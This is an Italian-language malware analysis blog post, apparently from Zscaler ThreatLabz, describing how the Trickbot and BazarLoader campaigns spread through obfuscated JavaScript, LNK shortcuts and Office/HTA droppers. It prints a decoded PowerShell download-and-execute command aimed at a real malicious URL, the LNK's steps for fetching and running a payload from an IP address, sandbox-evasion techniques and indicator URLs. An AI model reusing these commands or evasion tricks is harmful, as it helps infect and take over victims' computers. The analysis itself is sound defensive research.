Le nuove campagne Trickbot e BazarLoader utilizzano più vettori di distribuzione

Il team di ricerca  Zscaler ThreatLabz monitora ogni giorno migliaia di file tenendo traccia di minacce nuove e pervasive, che includono uno dei più importanti trojan bancari degli ultimi cinque anni: Trickbot. Trickbot è attivo dal 2016 ed è collegato a un gran numero di campagne dannose che hanno coinvolto il mining di bitcoin e il furto di informazioni bancarie, di informazioni di identificazione personale (PII) e di credenziali. BazarLoader è uno spinoff di questo trojan, sviluppato dagli stessi autori. Entrambi sono estremamente pericolosi, in quanto sono facilmente modificabili e in grado di fornire carichi utili a più fasi, oltre a prendere il controllo completo dei computer.

ThreatLabz ha scoperto che gli operatori di Trickbot, nelle recenti campagne di attacco, stanno impiegando nuovi approcci per distribuire carichi utili. I campioni di malware che abbiamo analizzato erano molto ben realizzati ed efficacemente nascosti, con capacità di eludere le sandbox. In questo post del blog, mostreremo l'analisi dei diversi vettori di distribuzione utilizzati da Trickbot e BazarLoader.

Punti chiave:

1. I file script e LNK hanno aggiunto tecniche di evasione per sfruttare le minacce malware.

2. L'offuscamento multilivello viene utilizzato per impedire l'analisi dei file JS e LNK.

3. Un allegato di Office rilascia un file HTA con frammenti di funzioni HTML e javascript.

4. I domini appena registrati vengono utilizzati per fornire minacce.

Trickbot sta ampliando la relativa gamma di tipi di file per la distribuzione di malware

Nelle campagne precedenti, i carichi utili di Trickbot venivano generalmente sganciati come allegati dannosi ai file di Microsoft Office. Nell'ultimo mese, abbiamo visto che i malware utilizzano ampiamente anche i file javascript, insieme a una serie di altri formati di file, come mostrato nelle seguenti tabelle:

 

Fig. 1: Trickbot bloccato con Zscaler Cloud Sandbox

Fig. 2: BazarLoader bloccato con Zscaler Cloud Sandbox

In questo blog esamineremo la catena di attacco per diversi vettori di distribuzione, tra cui: 

• Trickbot che si diffonde attraverso i file di script
• Trickbot che si diffonde attraverso i file LNK
• BazarLoader che si diffonde attraverso gli allegati di Office

Trickbot che si diffonde attraverso i file di script

Trickbot riesce a infiltrarsi utilizzando le e-mail di spam con allegati javascript dannosi, come i seguenti:  

Fig. 3: allegato di e-mail di spam

In questo caso, il file Javascript [5B606A5495A55F2BD8559778A620F21B] ha tre livelli di offuscamento che vengono utilizzati principalmente per eludere e bypassare gli ambienti di sandboxing. Di seguito è riportata l'istantanea del primo livello offuscato:

Fig. 4: primo livello di offuscamento in Javascript

Oltre a fare uno sforzo estremo per rendere i file Javascript altamente offuscati, gli autori di malware hanno anche aggiunto elevati quantitativi di junk code alla fine, per rendere più difficile il debug. Il junk code consiste in stringhe offuscate, generate casualmente che non giocano alcun ruolo nel codice dannoso.

Fig. 5: junk code per complicare l'analisi

Con l'utilizzo della funzione eval() abbiamo reso non offuscato il secondo livello, in cui il codice dannoso è incorporato in un altro junk code. Dopo aver rimosso questo livello di junk code, la funzione eval ()viene nuovamente utilizzata per recuperare il livello finale di codice. Possiamo notare che gli autori di Trickbot hanno utilizzato il metodo setTimeout (), che valuta un'espressione dopo 967 millisecondi per ritardare l'esecuzione nella sandbox. In questo modo il malware elude gli ambienti di sandboxing.

Fig. 6: secondo livello di offuscamento in Javascript

Nell'istantanea di cui sopra, possiamo vedere il metodo di sostituzione implementato nel codice, in cui le stringhe "hdBDJ"e "tSJVh" vengono rimosse rispettivamente dalle variabili "YHPhEFtKjqbCmAZ"e "kVYJOrLSqvdAWnaGTX" per ottenere la stringa finale.

Fig. 7: livello finale

Il Javascript dannoso esegue cmd.exe come processo figlio, quindi cmd.exe esegue powershell.exe per scaricare Trickbot come carico utile. 

Flusso di esecuzione: 

Wscript.exe ->cmd.exe->powershell.exe

Powershell.exe viene incorporato con il comando codificato base64 e dopo decodificato, con il comando seguente:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")

Fig. 8: rilevamento di Zscaler Cloud Sandbox di downloader di Javascript

Trickbot che si diffonde attraverso i file LNK

Le estensioni Windows LNK (LNK) sono generalmente viste dagli utenti come scorciatoie e spesso abbiamo osservato criminali informatici che utilizzano file LNK per scaricare file dannosi come Trickbot. Il Trickbot nasconde il codice nella sezione argomento, sotto la sezione delle proprietà del file LNK. L'autore del malware ha aggiunto spazi extra nel codice dannoso per tentare di rendere più difficile per i ricercatori il debug del codice. Abbiamo visto questa tecnica utilizzata in precedenza nella campagna Emotet del 2018, in cui sono stati utilizzati allegati di Office dannosi.

Fig. 9: codice incorporato nella sezione delle proprietà dell'LNK

Scaricamento di Trickbot:

1. L'LNK scarica il file da 45.148.121.227/images/readytunes.png utilizzando un argomento silenzioso, in modo che l'utente non possa visualizzare messaggi di errore o azioni in corso.
2. Dopo lo scaricamento, il malware salva il file nella cartella Temp con il nome application1_form.pdf.
3. Infine, il file viene rinominato da application1_form.pdf a support.exe ed eseguito. In questo caso, support.exe è Trickbot.

Fig. 10: rilevamento di Zscaler Cloud Sandbox di downloader di LNK

BazarLoader che si diffonde attraverso gli allegati di Office

Questa è una delle altre tecniche utilizzate in TA551 APT, ossia Shathak. I documenti dannosi di Office rilasciano il file HTA in "C\ProgramData\sda.HTA". Questo file HTA contiene HTML e vbscript progettati per recuperare una DLL dannosa per infettare un host Windows vulnerabile con BazarLoader. 

Una volta abilitata la macro, viene eseguito il processo mshta.exe per scaricare un carico utile. In passato, questa campagna è stata osservata con BazarLoader e Trickbot.

Fig. 11: catena di attacco di file DOC per scaricare BazarLoader

I dati codificati di base64 vengono implementati nel tag HTML <div>, utilizzato in seguito con JavaScript.

Fig. 12: rilascio di file HTA: base64 dannoso codificato nella sezione HTML <div>

Di seguito è riportata l'istantanea dei dati di decodifica di base64, dove è possibile vedere lo scaricamento del carico utile e il salvataggio come friendIFriend.jpg sul computer della vittima:

Fig. 13: rilascio del file HTA: decodifica dei dati di base64

Reti: C&C per scaricare BazarLoader

Fig. 14: invio della richiesta di scaricamento di BazarLoader

Abbiamo inoltre osservato nuovi domini registrati (NRD) creati appositamente per distribuire questi carichi di lavoro, utilizzando un 'ladro' di informazioni distribuito tramite posta indesiderata e abbinato a un allegato dannoso di Microsoft Office.

Fig. 15: dominio appena registrato

Fig. 16: rilevamento di Zscaler Cloud Sandbox del Downloader dannoso di Office

JS.Downloader.Trickbot

Win32.Backdoor.BazarLoader

VBA.Downloader.BazarLoader

MITRE ATT&CK

 

 

Indicatori di compromissione

 

 

 

URL associati:

jolantagraban.pl/log/57843441668980/dll/assistant.php

blomsterhuset-villaflora.dk/assistant.php

d15k2d11r6t6rl.cloudfront.net/public/users/beefree

C&C: